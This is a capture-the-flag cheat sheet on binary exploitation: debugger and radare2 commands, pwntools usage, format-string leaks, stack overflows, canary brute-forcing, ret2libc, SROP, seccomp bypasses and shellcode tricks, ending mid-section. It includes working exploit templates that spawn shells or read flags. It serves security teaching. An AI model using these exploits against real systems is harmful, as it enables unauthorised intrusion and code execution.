rax2 0x28                         # Hex/decimal conversion
rabin2 -I ./chall # Binary info
rabin2 -z ./chall # Data-section strings
rabin2 -zz ./chall # All strings
rabin2 -i ./chall # Imports
rabin2 -e ./chall # Entry points
r2 -A ./chall # Analyze and open
r2 -w ./chall # Open writable for patching
r2 -A -q -c "pdf @ main" ./chall # Non-interactive disassembly

Inside r2:

aaa             # Full analysis
afl # List functions
s main # Seek to symbol/address
s - # Seek back
pdf # Print current function
pdf @ sym.main # Print a function
pd 20 # Print 20 instructions
px 64 # Hexdump
iz # Strings in data sections
izz # Strings in whole binary
axt @ addr # Cross-references to address
axf @ addr # Cross-references from address
VV # Visual graph
wx 909090 # Patch raw bytes (requires -w)
wa nop # Assemble and patch instruction (requires -w)

Patching Notes

  • Patching data is safer than patching code when the target check compares constants or file-format bytes.
  • For code patches, inspect instruction length first; replacing a longer conditional branch with shorter bytes needs padding with nop.
  • In non-PIE ELF, runtime VA is often near file mapping base 0x400000; still convert VA to file offset using program headers or tooling instead of guessing.
rasm2 -a x86 -b 64 "nop"
rasm2 -a x86 -b 64 -d "90"
objdump -d -Mintel ./chall | less
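The NOP-padding rule can be scripted once you have a file offset. A minimal sketch; patch_bytes is a hypothetical helper, and the example replaces a 6-byte je rel32 (0f 84 followed by a 4-byte displacement) with NOPs so the branch is never taken. Work on a copy of the binary.

```python
from pathlib import Path

NOP = b"\x90"


def patch_bytes(path: str, offset: int, new: bytes, old_len: int) -> bytes:
    """Overwrite old_len bytes at a file offset with `new`, padding the rest with NOPs.

    Returns the original bytes so the patch can be reverted.
    """
    data = bytearray(Path(path).read_bytes())
    if len(new) > old_len:
        raise ValueError("replacement is longer than the instruction it overwrites")
    if offset + old_len > len(data):
        raise ValueError("patch runs past the end of the file")
    old = bytes(data[offset:offset + old_len])
    data[offset:offset + old_len] = new + NOP * (old_len - len(new))
    Path(path).write_bytes(bytes(data))
    return old


# patch_bytes("./chall.patched", 0x123a, b"", 6)  # NOP out a 6-byte je at file offset 0x123a
```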

Pwndbg

pwndbg /path/to/binary    # Launch
start # Break at main (pwndbg falls back to _start or the entry point if there is no main)
starti # Break at first instruction (initialization code)
entry # Break at ELF entry point
info functions # List all analyzed function symbols
info frame # Show current stack frame
piebase # Show PIE base address
vmmap # Show memory layout (r-x, rw-, etc.)
breakrva 0x19e3 # Break at Relative Virtual Address (useful for PIE)
stack # Show stack
canary # Print and find canaries on the stack
context <section> # Show specific context window
checksec # Check binary security features (RELRO, canary, NX, PIE)
cyclic 100 # Generate 100-byte De Bruijn sequence
cyclic -l 0x6161616c # Find overflow offset using crash address
retaddr # Highlight return addresses in the current stack frame
rop # Simple ROP Gadget search
got # Show GOT state (resolved vs unresolved)
plt # View Procedure Linkage Table
heap # Overview of all heap chunks and their status
bins # View free lists (fastbins, unsorted, small, large, tcache)
arena # View detailed structure of the main arena (malloc_state)

p $rsp # Show current stack pointer
disass main # Disassemble 'main' function
break *main+123 # Breakpoint at main+123
Category | Command
--- | ---
Stepping | n (step over), s (step into), fin (finish), c (continue)
Breakpoints | b *main+123, b <symbol>
Memory | x/11s <addr>, hexdump <addr> 44, tele <addr>
Info | context, vmmap, xinfo <addr>, checksec

My ~/.gdbinit:

source /usr/share/pwndbg/gdbinit.py
set history save on
set follow-fork-mode child
set disassembly-flavor intel

# may be useless
set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

python
import os
import atexit
import pwndbg
from pwndbg.commands.context import contextoutput

if 'TMUX' in os.environ:
    created_panes = []

    def create_pane(split_cmd):
        output = os.popen(split_cmd).read().strip()
        if not output: return None, None
        pane_id, tty = output.split(":")
        created_panes.append(pane_id)
        return pane_id, tty

    p_disasm_id, p_disasm_tty = create_pane('tmux split-window -vb -P -F "#{pane_id}:#{pane_tty}" -l 75% -d "cat -"')
    p_stack_id, p_stack_tty = create_pane(f'tmux split-window -v -P -F "#{{pane_id}}:#{{pane_tty}}" -l 40% -t {p_disasm_id} -d "cat -"')
    p_bt_id, p_bt_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -t -1 -l 30% -d "cat -"')
    p_regs_id, p_regs_tty = create_pane(f'tmux split-window -h -P -F "#{{pane_id}}:#{{pane_tty}}" -t {p_stack_id} -l 30% -d "cat -"')
    p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

    if p_disasm_tty: contextoutput("disasm", p_disasm_tty, True, 'top', False)
    if p_stack_tty: contextoutput("stack", p_stack_tty, True, 'top', False)
    if p_bt_tty: contextoutput("backtrace", p_bt_tty, True, 'top', False)
    if p_regs_tty: contextoutput("regs", p_regs_tty, True, 'top', False)

    if p_stack_tty: contextoutput("legend", p_stack_tty, True)
    if p_regs_tty: contextoutput("expressions", p_regs_tty, True, 'top', False)

    def cleanup_panes():
        for pid in created_panes:
            os.system(f"tmux kill-pane -t {pid} >/dev/null 2>&1")

    atexit.register(cleanup_panes)
else:
    print("\n[\033[33m*\033[0m] Not running inside TMUX. Standard pwndbg output will be used.")

pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18
end

pwntools

from pwn import *
context.arch = "amd64"  # asm()/shellcraft default to i386 otherwise
context.terminal = ['tmux', 'splitw', '-h']
p = gdb.debug("./vuln", gdbscript="b *main+1\nc")
p.send(cyclic(123))
offset = cyclic_find(0x6161616a) # Finds 'jaaa' (offset 36)

import IPython
IPython.embed() # Launch IPython
# leak = u64(p.recvline(keepends=False).ljust(8, b'\x00'))

# Alternative shellcode payloads (keep the one you need):
sc = asm(shellcraft.sh())
sc = asm(shellcraft.cat("/flag"))
sc = asm(shellcraft.chmod("/flag", 0o444))

View shellcraft:

pwn shellcraft -l
# Output format (default: hex), choose from {e}lf, {r}aw, {s}tring, {c}-style array, {h}ex string, hex{i}i, {a}ssembly code, {p}reprocessed code, escape{d} hex string
pwn shellcraft amd64.linux.sh -f d

De Bruijn Sequence (Cyclic)

A De Bruijn sequence \(B(k, n)\) is a cyclic sequence where every possible string of length \(n\) over an alphabet of size \(k\) appears exactly once.
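For intuition, here is a from-scratch sketch of the standard Lyndon-word (FKM) construction of B(k, n), plus cyclic/cyclic_find helpers. It uses pwntools' default lowercase alphabet and n=4, so offsets should agree with pwntools for short patterns, but it is not pwntools' code; the limit parameter is my own simplification.

```python
from itertools import islice
from typing import Iterator

ALPHABET = "abcdefghijklmnopqrstuvwxyz"  # pwntools' default cyclic alphabet


def de_bruijn(alphabet: str = ALPHABET, n: int = 4) -> Iterator[str]:
    """Yield B(k, n), k = len(alphabet), by concatenating Lyndon words in order."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int) -> Iterator[int]:
        if t > n:
            if n % p == 0:
                yield from a[1:p + 1]  # emit one Lyndon word whose length divides n
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    for index in db(1, 1):
        yield alphabet[index]


def cyclic(length: int, n: int = 4) -> bytes:
    return "".join(islice(de_bruijn(n=n), length)).encode()


def cyclic_find(chunk: bytes, n: int = 4, limit: int = 20_000) -> int:
    """Offset of the first n bytes of `chunk` within the first `limit` pattern bytes, or -1."""
    return cyclic(limit, n).find(chunk[:n])


print(cyclic(16))              # b'aaaabaaacaaadaaa'
print(cyclic_find(b"laaa"))    # 44
```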

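  • Why it's used: When a binary crashes due to a buffer overflow, the saved return address has been overwritten by a 4 or 8-byte chunk of the sequence. Since every chunk is unique, cyclic_find can instantly determine the exact offset needed for the exploit. On amd64 such a chunk (e.g. 0x6161616c6161616b) is a non-canonical address, so ret usually faults before RIP changes; read the value at [RSP] instead of RIP.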

Crash-offset workflow:

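from pwn import *

context.arch = "amd64"
p = process("./chall")
p.send(cyclic(300))  # default subsequence size n=4
p.wait()

# In GDB/pwndbg, read the overwritten value at [RSP] (or RIP if it changed), then:
offset = cyclic_find(0x6161616c)  # 4-byte chunk 'laaa' -> 44
offset = cyclic_find(p64(0x6161616c6161616b)[:4])  # 8-byte value: look up its low 4 bytes, 'kaaa' -> 40
# With cyclic(300, n=8), look up with the same n: cyclic_find(p64(value), n=8)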

cyclic() uses 4-byte subsequences (n=4) by default, even with context.arch = "amd64". If you switch to 8-byte subsequences, pass the same n to both cyclic() and cyclic_find().

Environment Control

  • Disable ASLR for Debugging: gdb disables ASLR by default. For a clean environment, use setarch x86_64 -R /bin/bash to spawn a shell where all child processes (excluding SUID) have ASLR disabled.
  • SUID Trap: gdb cannot disable ASLR for SUID binaries due to kernel security. Remove the SUID bit (chmod u-s) or copy the binary to a local directory before debugging.
  • Global ASLR Toggle: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space (Reset to 2 when finished).

Environment affects stack addresses. argv[0] length, environment variables, terminal, and pwntools launching mode can shift stack buffers. Use env={} in process() or add a NOP sled when stack shellcode depends on approximate addresses.

Information Disclosure Causes

String Termination Problems

C strings are null-terminated, meaning they lack length metadata and rely on a 0x00 byte to mark the end.

  • Missing Null byte: If a program reads exactly \(N\) bytes into an \(N\)-byte buffer (e.g., using read()), it won't append a null byte.
  • Disclosure: Functions like printf("%s") will continue reading past the buffer until they hit a null byte, potentially leaking adjacent sensitive data like a flag or canary.

Uninitialized Data (Stack Frame Reuse)

  • Frame Persistence: When a function returns, its stack frame is not cleared. The RSP simply moves back up.
  • Ghost Data: If a subsequent function call allocates a frame over the same memory area and fails to initialize its variables, it can read or "leak" the "ghost" data left by the previous function.

Compiler Backstabbing (Dead Store Elimination)

  • The Trap: A developer might use memset(buf, 0, size) to clear a sensitive flag before a function returns.
  • DSE: If the compiler (with -O2 or -O3) determines that buf is never read again before the function returns, it may "optimize out" the memset entirely, leaving the secret data on the stack. Use explicit_bzero() (glibc 2.25+ and the BSDs), memset_s() where C11 Annex K is available, or a compiler memory barrier after the memset; -fno-inline alone does not prevent this.

Format String Leaks

printf(user_input) treats user bytes as a format string. This can leak stack/register values and, with %n, write memory.

%p %p %p %p              # leak pointers
%lx.%lx.%lx # leak words
%7$sAAAA<addr> # read string from controlled address, offset depends on stack layout
%hhn / %hn / %n / %ln # write 1 / 2 / 4 / 8 bytes of the printed-character count

Pwntools helpers:

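from pwn import *

# Assumes: elf = ELF("./chall"), libc = ELF(...) rebased from a leak (libc.address = ...),
# and exec_fmt(payload) sends one payload to a fresh process and returns its output.
offset = FmtStr(exec_fmt).offset
payload = fmtstr_payload(offset, {elf.got["printf"]: libc.sym["system"]})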

Common path with writable GOT: leak a libc address, calculate libc.address, then overwrite printf@GOT/puts@GOT with system or an offset into win.

Memory Corruption Primitives

Stack Buffer Overflow

Typical offset calculation:

buf = rbp - 0x60
saved RBP = rbp
return address = rbp + 8
offset_to_ret = 0x60 + 8

Ret2win payload:

payload = b"A" * offset_to_ret + p64(elf.sym["win"])
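The offset arithmetic above, written out with only the standard library. The win address 0x401196 is a made-up non-PIE address; in a pwntools script you would use elf.sym["win"] and p64 instead of struct.

```python
import struct


def ret2win_payload(buf_below_rbp: int, win_addr: int) -> bytes:
    """Padding up to the saved return address, then the new return address.

    buf_below_rbp: distance from the buffer start to RBP (0x60 for buf = rbp - 0x60).
    """
    offset_to_ret = buf_below_rbp + 8  # buffer bytes + the 8-byte saved RBP
    return b"A" * offset_to_ret + struct.pack("<Q", win_addr)


payload = ret2win_payload(0x60, 0x401196)
print(len(payload), payload[0x68:].hex())  # 112 9611400000000000
```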

If win_authed(token) checks a stack/local token, sometimes jump past the check instead of calling the function entry. This is an offset jump. Make sure the target instruction does not depend on skipped setup.

Canary Bypass Patterns

  • Direct leak: program prints past the canary because the input overwrote its leading \x00 terminator.
  • Residual stack leak: another function leaves a canary copy or secret in reused stack memory.
  • Recursive/retry path: trigger a path that re-enters vulnerable code before the outer canary is checked.
  • Fork brute-force: child crashes do not randomize parent canary; brute-force byte-by-byte.
  • Skip canary write zone: corrupt loop index, pointer, length, or destination so writes land after the canary.

Stack canary on amd64 usually has a null low byte. Leak reconstruction often looks like:

canary = u64(b"\x00" + leak7)
payload = flat(b"A" * off, canary, b"B" * 8, target)
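The same reconstruction can be done without pwntools. In this sketch, struct.pack stands in for p64, and the frame layout (canary, then saved RBP, then return address) is the usual amd64 layout assumed above. The offset and target address are hypothetical:

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def canary_from_leak(leak7: bytes) -> int:
    """amd64 glibc canaries have a 0x00 low byte; the leak only carries the upper 7 bytes."""
    if len(leak7) != 7:
        raise ValueError("expected the 7 bytes that follow the canary's null byte")
    return int.from_bytes(b"\x00" + leak7, "little")


def build_payload(offset: int, canary: int, target: int) -> bytes:
    # filler up to the canary | canary | saved RBP placeholder | new return address
    return b"A" * offset + p64(canary) + b"B" * 8 + p64(target)


canary = canary_from_leak(bytes.fromhex("11223344556677"))
payload = build_payload(0x48, canary, 0x401196)  # hypothetical offset and target
print(hex(canary))  # 0x7766554433221100
```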

Signedness & Integer Bugs

Danger pattern: check in signed arithmetic, use in unsigned API.

char buf[64];
int size;
scanf("%d", &size);
if (size <= 64) {
    read(0, buf, size); // size converted to size_t
}

-1 passes size <= 64, then becomes 0xffffffffffffffff as size_t.
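Here is a small Python model of that conversion, assuming an LP64 target where size_t is 64 bits:

```python
SIZE_T_MASK = (1 << 64) - 1  # size_t on LP64 (e.g. amd64 Linux)


def as_size_t(value: int) -> int:
    """Model the implicit int -> size_t conversion (two's complement, mod 2**64)."""
    return value & SIZE_T_MASK


def signed_check_passes(size: int, limit: int = 64) -> bool:
    return size <= limit  # signed comparison: every negative value passes


size = -1
print(signed_check_passes(size), hex(as_size_t(size)))  # True 0xffffffffffffffff
```

Declaring size as an unsigned type, or rejecting size < 0 before the call, closes the gap.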

Integer multiplication overflow:

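size_t count, record_size;                     /* attacker-controlled, 64-bit */
uint32_t bytes = count * record_size;          /* product truncated to 32 bits */
if (bytes <= sizeof(buf)) read(0, buf, count * record_size);  /* full 64-bit product */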

If the product is truncated for the check but the later copy/read uses the full-width product, the bounds check is bypassed.
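Here are worked numbers, assuming count and record_size are 64-bit size_t values while bytes is uint32_t:

```python
U32_MASK = (1 << 32) - 1


def check_then_read(count: int, record_size: int, buf_size: int):
    """Mirror the C snippet: the check sees a truncated uint32_t, read() sees the full product."""
    checked = (count * record_size) & U32_MASK  # uint32_t bytes = count * record_size;
    passes = checked <= buf_size                 # if (bytes <= sizeof(buf))
    read_len = count * record_size               # read(0, buf, count * record_size)
    return passes, checked, read_len


passes, checked, read_len = check_then_read(0x40000001, 4, 64)
print(passes, hex(checked), hex(read_len))  # True 0x4 0x100000004
```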

OOB Indexing

  • Negative index can read/write before an array.
  • Positive overlarge index can reach later locals, heap metadata, GOT, vtables, function pointers, or adjacent objects.
  • Convert byte distance to index by dividing by element size.
index = (target_addr - array_base) // element_size

Partial Pointer Overwrite

Partial overwrite changes only low bytes of a pointer. Useful when high bytes are stable due to page alignment or same mapping.

payload = b"A" * offset + p16(target_low_16)

This works best when source and destination are in the same module/stack/heap region or when only the low page offset must change.
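In integer terms, a little-endian partial overwrite keeps the high bytes and swaps the low ones. Here is a sketch with made-up addresses:

```python
import struct


def partial_overwrite(pointer: int, new_low: int, nbytes: int = 2) -> int:
    """Value of a little-endian pointer after its lowest `nbytes` bytes are overwritten."""
    mask = (1 << (8 * nbytes)) - 1
    return (pointer & ~mask) | (new_low & mask)


saved = 0x55555555A1B2                               # hypothetical saved pointer
in_memory = struct.pack("<Q", saved)
after = struct.pack("<H", 0x1337) + in_memory[2:]    # what p16(...) over the first two bytes does
print(hex(struct.unpack("<Q", after)[0]), hex(partial_overwrite(saved, 0x1337)))
```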

GOT Overwrite

Requirements:

  • GOT target must be writable: No RELRO or Partial RELRO (where .got.plt stays writable). Full RELRO remaps the GOT read-only after relocation.
  • A write primitive reaches the target GOT entry.
  • The overwritten function is called after the overwrite.

Common targets:

  • printf@GOT -> system, then pass "/bin/sh" or a command string to printf.
  • puts@GOT -> win + offset, but avoid recursion if win itself calls puts first.

Heap Bug Classes

  • UAF: use a pointer after free; can become type confusion if the freed chunk is reallocated as another object.
  • Double free: same chunk inserted into a free list twice; allocator-dependent exploitability.
  • Overflow into metadata/object: corrupt size, next pointer, function pointer, vtable, length, or data pointer.
  • Aliased backing store: a high-level view (ArrayBuffer, slice, sprite, ledger view) still references native heap memory after resize/free.

Pwndbg commands:

heap
vis_heap_chunks
bins
tcachebins
fastbins
unsortedbin
arena

ASLR & Bypass Techniques

Method 1: Memory Leak

Despite ASLR, the relative offset between functions and data within the same module remains constant.

  1. Leak a known pointer (e.g., a function address in the GOT).
  2. Subtract its constant offset to find the base address.
  3. Calculate the addresses of all other gadgets/functions.
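The arithmetic is a subtraction plus a sanity check. This sketch uses hypothetical numbers: the puts and system offsets below are invented, so read real ones from the target's libc (for example libc.sym in pwntools):

```python
PAGE_SIZE = 0x1000


def base_from_leak(leaked: int, symbol_offset: int) -> int:
    """Module base = leaked runtime address - the symbol's offset inside the module."""
    base = leaked - symbol_offset
    if base % PAGE_SIZE:
        raise ValueError(f"base {base:#x} is not page-aligned: wrong symbol or wrong libc?")
    return base


PUTS_OFFSET, SYSTEM_OFFSET = 0x80E50, 0x50D70  # hypothetical libc offsets
libc_base = base_from_leak(0x7F3A1C880E50, PUTS_OFFSET)
system_addr = libc_base + SYSTEM_OFFSET
print(hex(libc_base), hex(system_addr))  # 0x7f3a1c800000 0x7f3a1c850d70
```

A base that is not page-aligned is the quickest sign that the leak was parsed wrongly or the libc version does not match.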

Method 2: Partial Overwrite (YOLO)

Memory is managed in pages (typically 0x1000 bytes). The lowest 12 bits of an address represent the page offset and are not randomized by ASLR.

  • Strategy: Overwrite only the least significant 1 or 2 bytes of the return address. This redirects execution within the same page (or a nearby one) without knowing the randomized base. A 1-byte overwrite stays inside the fixed low 12 bits. A 2-byte overwrite also sets bits 12-15, which ASLR randomizes, so a fixed guess succeeds with probability 1/16.
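A quick Monte Carlo check of the 1/16 figure, modelling ASLR as a random page-aligned base. The 28 random bits and the target offset are illustrative:

```python
import random


def two_byte_guess_hits(rng: random.Random, target_offset: int, nibble_guess: int) -> bool:
    base = rng.getrandbits(28) << 12                # page-aligned: low 12 bits are always 0
    actual_low16 = (base + target_offset) & 0xFFFF  # bits 0-11 fixed, bits 12-15 random
    written = (nibble_guess << 12) | (target_offset & 0xFFF)
    return written == actual_low16


rng = random.Random(1337)
trials = 16_000
hits = sum(two_byte_guess_hits(rng, 0x1A2B, 0x0) for _ in range(trials))
rate = hits / trials
print(f"success rate {rate:.4f} (expected {1 / 16:.4f})")
```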

Method 3: Fork Brute-force

In a fork()-based network server, child processes inherit the exact memory layout of the parent, including ASLR offsets and the canary.

  • Strategy: Brute-force the canary or return address byte-by-byte. If the child crashes, the parent simply forks a new one with the same values, so the attacker gets unlimited attempts.

Canary brute-force skeleton:

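from pwn import *

offset_to_canary = 0x48   # placeholder: distance from the buffer start to the canary
canary = b"\x00"          # amd64 canary low byte is always 0x00
for i in range(7):
    for guess in range(256):
        io = remote("host", 1337)
        payload = b"A" * offset_to_canary + canary + bytes([guess])
        io.send(payload)
        out = io.recvall(timeout=0.2)
        io.close()
        # adjust this test to whatever the server prints on a clean return
        if b"stack smashing detected" not in out and b"crash" not in out:
            canary += bytes([guess])
            break
    else:
        raise RuntimeError(f"no byte accepted at index {len(canary)}")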
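Byte-by-byte brute force is fast because each byte is confirmed on its own. The worst case is 7 × 256 connections instead of 2^56 guesses. The following local simulation of the loop above replaces the forking server with a hypothetical oracle, which returns True when the child would survive:

```python
import os
from typing import Callable, Tuple


def make_oracle(canary: bytes) -> Callable[[bytes], bool]:
    """Fake server: the child survives only if every canary byte sent so far is correct."""
    def survives(prefix: bytes) -> bool:
        return canary.startswith(prefix)
    return survives


def brute_force_canary(survives: Callable[[bytes], bool], size: int = 8) -> Tuple[bytes, int]:
    known = b"\x00"  # low byte is 0x00 on amd64 glibc
    attempts = 0
    while len(known) < size:
        for guess in range(256):
            attempts += 1
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError(f"no byte accepted after {known.hex()}")
    return known, attempts


secret = b"\x00" + os.urandom(7)
recovered, attempts = brute_force_canary(make_oracle(secret))
print(recovered == secret, attempts)
```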

Method 4: ret2libc

With NX enabled, call existing libc code instead of injecting code.

  1. Leak a libc pointer, e.g. puts(puts@GOT).
  2. Compute libc.address = leaked_puts - libc.sym["puts"].
  3. Call system("/bin/sh") or execve gadgets.
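from pwn import *

elf = context.binary = ELF("./chall")
libc = ELF("./libc.so.6")
rop = ROP(elf)
pop_rdi = rop.find_gadget(["pop rdi", "ret"])[0]
ret = rop.find_gadget(["ret"])[0]
offset = 0x48                     # placeholder: distance from the buffer to saved RIP
io = process(elf.path)            # or remote(...)

# stage 1: puts(puts@GOT), then return to main for a second overflow
payload = flat(
    b"A" * offset,
    pop_rdi,
    elf.got["puts"],
    elf.plt["puts"],
    elf.sym["main"],
)
io.sendline(payload)

# receive leak (assumes it is alone on its line; adjust to the program's output), then second stage
leak = u64(io.recvline(keepends=False).ljust(8, b"\x00"))
libc.address = leak - libc.sym["puts"]
binsh = next(libc.search(b"/bin/sh\x00"))
payload = flat(
    b"A" * offset,
    ret,  # optional stack alignment
    pop_rdi,
    binsh,
    libc.sym["system"],
)
io.sendline(payload)
io.interactive()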

Method 5: ret2plt / ret2csu

  • ret2plt: call imported functions through PLT when the binary has useful PLT entries and controlled arguments.
  • ret2csu: use gadgets inside __libc_csu_init to populate RDI, RSI, RDX when simple pop rdi; ret / pop rsi; ret gadgets are missing. Binaries linked against glibc 2.34 or newer no longer contain __libc_csu_init.

Typical ret2csu idea:

gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
gadget 2: mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]

Set rbx = 0, rbp = 1, r12 = function_pointer_table, r13 = arg1, r14 = arg2, r15 = arg3.
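Here is a chain builder for that register setup. It assumes the typical __libc_csu_init layout, where gadget 2 is followed by add rbx, 1; cmp rbp, rbx; jne; then add rsp, 8 and the six pops of gadget 1. Register order varies between builds, so check the binary's disassembly first. All addresses in the example are hypothetical:

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def csu_chain(gadget1: int, gadget2: int, func_ptr_slot: int,
              arg1: int, arg2: int, arg3: int, next_ret: int) -> bytes:
    chain = [
        gadget1,        # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
        0,              # rbx = 0 -> call [r12 + 0*8]
        1,              # rbp = 1 -> "add rbx, 1; cmp rbp, rbx" falls through the loop
        func_ptr_slot,  # r12 = address *holding* the function pointer (e.g. a GOT entry)
        arg1,           # r13 -> edi (only the low 32 bits survive)
        arg2,           # r14 -> rsi
        arg3,           # r15 -> rdx
        gadget2,        # mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12+rbx*8]
    ]
    chain += [0] * 7    # fall-through: add rsp, 8 plus six pops consume 7 qwords
    chain.append(next_ret)
    return b"".join(p64(value) for value in chain)


chain = csu_chain(0x40069A, 0x400680, 0x601018, 0xDEADBEEF, 0, 0, 0x400560)
print(len(chain))  # 128
```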

Method 6: SROP

Sigreturn-oriented programming uses a fake rt_sigreturn frame to set all registers. Useful when gadgets are scarce but you can execute syscall with RAX = 15 (rt_sigreturn).

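context.arch = "amd64"            # SigreturnFrame and constants need the target arch
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh                 # address of "/bin/sh\x00"
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret           # address of a syscall (; ret) gadget
payload = flat(b"A" * offset, pop_rax, 15, syscall_ret, bytes(frame))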

Seccomp Notes

If shellcode or ROP mysteriously dies on execve, check seccomp filters.

seccomp-tools dump ./chall
strace ./chall

Common bypasses:

  • If execve is blocked but file syscalls are allowed: open/read/write or sendfile the flag.
  • If open is blocked but openat allowed: use openat(AT_FDCWD, "/flag", 0).
  • If only read, write, exit, sigreturn are allowed: consider SROP or staged ROP.

Shellcoding

Toolchain

# Compile shellcode (static, no libc)
gcc -nostdlib -static shellcode.s -o shellcode-elf

# Extract raw shellcode bytes
objcopy --dump-section .text=shellcode-raw shellcode-elf

# Compile with RWX .text (for SMC)
gcc -Wl,-N --static -nostdlib -o test test.s

Forbidden Bytes

Avoid bytes that terminate or split input strings:

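| Byte | Name | Trigger |
|------|------|---------|
| 0x00 | null byte | strcpy, printf("%s") (terminator) |
| 0x0a | newline | fgets, scanf (end of input) |
| 0x20 | space | scanf("%s") (separator; tab and 0x0b-0x0d also count as whitespace) |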
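Before sending, it helps to scan the assembled bytes for anything in that table. The helper below assumes the table's bad set plus the other whitespace bytes that scanf("%s") also stops on (0x09, 0x0b, 0x0c, 0x0d). The instruction encodings in the example are the standard ones for mov rax, 0 and xor eax, eax:

```python
from typing import Dict, List, Tuple

BAD_BYTES: Dict[int, str] = {
    0x00: "null",
    0x0A: "newline",
    0x20: "space",
    0x09: "tab",
    0x0B: "vertical tab",
    0x0C: "form feed",
    0x0D: "carriage return",
}


def find_bad_bytes(code: bytes, bad: Dict[int, str] = BAD_BYTES) -> List[Tuple[int, str]]:
    """(offset, name) for every forbidden byte in `code`."""
    return [(offset, bad[byte]) for offset, byte in enumerate(code) if byte in bad]


print(find_bad_bytes(bytes.fromhex("48c7c000000000")))  # mov rax, 0
print(find_bad_bytes(bytes.fromhex("31c0")))            # xor eax, eax
```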

Null Byte Avoidance Techniques

| Bad | Good | Reason |
|-----|------|--------|
| mov rax, 0 | xor eax, eax | the imm32 0 encodes as four 0x00 bytes |
| mov rax, 5 | xor eax, eax; mov al, 5 | avoids the 0x00 padding in the immediate |
| mov rax, 10 | push 9; pop rax; inc rax | avoids 0x0a (newline); push 10 would encode 6a 0a |

Other size/filter tricks:

  • Use 32-bit register writes (eax, edi, esi) to avoid REX.W (0x48) and zero-extend into 64-bit registers.
  • Use push imm; pop reg for small constants.
  • Use cdq to clear RDX: it sign-extends EAX into EDX (and the 32-bit write clears the upper half of RDX), so RDX = 0 whenever EAX is non-negative.
  • Store strings on the stack in little-endian order.
  • XOR-encode constants to avoid bad bytes, then decode in-place.
  • If shellcode is called through a register, inspect live registers before execution; they may point to the shellcode mapping and save bytes with lea.
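The XOR trick from the list above is what the pwntools-style /flag listing below does with 0x0101010101010101. The following sketch searches for such a repeated-byte key. The default bad-byte set is an assumption, so adjust it to the target:

```python
from typing import Tuple


def xor_encode(value: int, bad: bytes = b"\x00\x0a\x20", width: int = 8) -> Tuple[int, int]:
    """Find a repeated-byte key so neither the key nor value ^ key contains a bad byte."""
    for k in range(1, 256):
        if k in bad:
            continue
        key = int.from_bytes(bytes([k]) * width, "little")
        encoded = value ^ key
        if not any(b in bad for b in encoded.to_bytes(width, "little")):
            return key, encoded
    raise ValueError("no repeated single-byte key works")


value = int.from_bytes(b"/flag\x00\x00\x00", "little")  # 0x67616c662f
key, encoded = xor_encode(value)
print(hex(key), hex(encoded))
```

At runtime the shellcode pushes one of the two constants and XORs the other into [rsp], which reconstructs the original string without ever embedding its null bytes.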

NOP Sled & Stack Shellcode

NOP sled (\x90) tolerates approximate jump targets. It is useful when stack addresses shift due to environment differences.

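context.arch = "amd64"   # asm()/shellcraft need the target architecture
nop_sled = b"\x90" * 512
shellcode = asm(shellcraft.cat("/flag"))
payload = nop_sled + shellcode
payload = payload.ljust(offset, b"A") + p64(approx_stack_addr)   # aim somewhere inside the sled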

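Avoid stack self-destruction: after ret, RSP points just above the overwritten return-address slot. Shellcode that uses push writes below RSP, first over that slot and then over the end of the buffer, which is often where the shellcode itself sits. Keep the shellcode far enough below RSP (or place it after the return address), move RSP away before pushing, or use a large sled.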

Staged Shellcode

When input length is too small, first-stage shellcode reads a larger second stage into RWX memory or stack, then jumps there.

; read(0, rsp, 0x400); jmp rsp
xor eax, eax
xor edi, edi
mov rsi, rsp
xor edx, edx
mov dh, 0x4          ; rdx = 0x400; mov dx, 0x400 would keep RDX's stale upper bits and encode a 0x00
syscall
jmp rsp

Self-Modifying Code (SMC)

Runtime modification of the .text segment to bypass static filters. Requires the segment to be writable (-Wl,-N).

; Bypassing 'syscall' (0x0f05) filter
inc BYTE PTR [RIP+1]
.byte 0x0f
.byte 0x04 ; Runtime: 0x04 -> 0x05 (creating 0x0f05)

If the first page is made RX after input, place the patching code and patch targets on a later still-writable page, or use a first-stage jump over the protected region.
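This defeats a byte-level filter because the filter inspects the code before it runs, and the 0f 05 pair only exists after the inc executes. Here is a toy model, where the filter function is hypothetical:

```python
SYSCALL = b"\x0f\x05"


def filter_accepts(code: bytes) -> bool:
    """Hypothetical static filter: reject any input containing the syscall opcode."""
    return SYSCALL not in code


def run_inc_patch(code: bytes, index: int) -> bytes:
    """Effect of `inc byte ptr [...]` on one byte at runtime (wraps at 256)."""
    patched = bytearray(code)
    patched[index] = (patched[index] + 1) & 0xFF
    return bytes(patched)


stub = b"\x0f\x04"  # what the filter sees
print(filter_accepts(stub), run_inc_patch(stub, 1) == SYSCALL)  # True True
```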

CET: SHSTK & IBT

Intel CET adds hardware CFI:

  • SHSTK (Shadow Stack): return addresses are mirrored on a protected shadow stack, and ret compares the return address on the normal stack against the shadow copy. A classic saved-RIP overwrite therefore faults (#CP) even when the stack canary is disabled.
  • IBT (Indirect Branch Tracking): indirect call/jmp targets must start with endbr64 (f3 0f 1e fa).
  • notrack prefix: notrack jmp rax can bypass IBT checks for that branch, so a corrupted function pointer/register may jump to shellcode or arbitrary code even when IBT is enabled.
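When you look for IBT-valid targets in a dump of .text, a raw byte search for the endbr64 encoding is a reasonable first pass. A byte scan can also report sequences that sit inside longer instructions, so confirm candidates in a disassembler. The sample bytes are hypothetical:

```python
from typing import List

ENDBR64 = bytes.fromhex("f30f1efa")


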